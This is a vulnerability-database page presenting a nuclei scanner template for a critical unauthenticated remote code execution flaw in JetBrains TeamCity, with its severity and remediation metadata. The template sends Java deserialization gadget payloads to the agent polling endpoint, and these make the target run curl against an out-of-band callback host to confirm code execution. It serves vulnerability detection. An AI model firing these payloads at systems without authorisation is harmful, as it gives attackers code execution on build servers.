Lucene search
+L

JetBrains TeamCity < 2026.1.3, 2025.11.7 - Remote Code Execution

🗓️ 10 Aug 2026 16:17:46Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

JetBrains TeamCity before 2026.1.3 and 2025.11.7 allows remote code execution via agent polling.

Related
Refs
Code
id: CVE-2026-63077

info:
  name: JetBrains TeamCity < 2026.1.3, 2025.11.7 - Remote Code Execution
  author: 0x_Akoko,pdteam
  severity: critical
  description: |
    JetBrains TeamCity < 2026.1.3, 2025.11.7 contains a remote code execution caused by unauthenticated access via the agent polling protocol, letting unauthenticated attackers execute arbitrary code remotely, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary code remotely, potentially leading to full system compromise.
  remediation: |
    Upgrade to version 2026.1.3, 2025.11.7 or later.
  reference:
    - https://blog.jetbrains.com/teamcity/2026/07/cve-2026-63077/
    - https://www.rapid7.com/blog/post/etr-cve-2026-63077-critical-unauthenticated-remote-code-execution-in-jetbrains-teamcity/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-63077
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-63077
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-63077
    cwe-id: CWE-502
    epss-score: 0.0101
    epss-percentile: 0.59837
    cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: jetbrains
    product: teamcity
    shodan-query: title:"TeamCity"
    fofa-query: title="TeamCity"
  tags: cve,cve2026,jetbrains,teamcity,rce,deserialization,kev,oast,intrusive,vkev

flow: http(1) && (http(2) || http(3) || http(4))

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(body, "TeamCity", "teamcity", "JetBrains")'
        condition: and
        internal: true

  - raw:
      - |
        POST /app/agents/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream
        User-Agent: TeamCity Agent/2026.1

        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_any(interactsh_protocol, "dns", "http")'
        condition: and

  - raw:
      - |
        POST /app/agents/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream
        User-Agent: TeamCity Agent/2026.1

        {{generate_java_gadget("commons-collections3.1", "curl http://{{interactsh-url}}/cc31-rce", "raw")}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_any(interactsh_protocol, "dns", "http")'
        condition: and

  - raw:
      - |
        POST /app/agents/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream
        User-Agent: TeamCity Agent/2026.1

        {{generate_java_gadget("groovy1", "curl http://{{interactsh-url}}/groovy-rce", "raw")}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'contains_any(interactsh_protocol, "dns", "http")'
        condition: and
# digest: 4a0a004730450221009ce59f8d5e24e816c29a723f7e9fa0ef572b85adc73047baeece813b968e029c022017981bfb15bb9154f20386e1b8b3e683217f7ad2ff34270a01c7fc276eb91400:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Aug 2026 02:38Current
9.8High risk
Vulners AI Score9.8
CVSS 3.19.8
EPSS0.10722
SSVC
13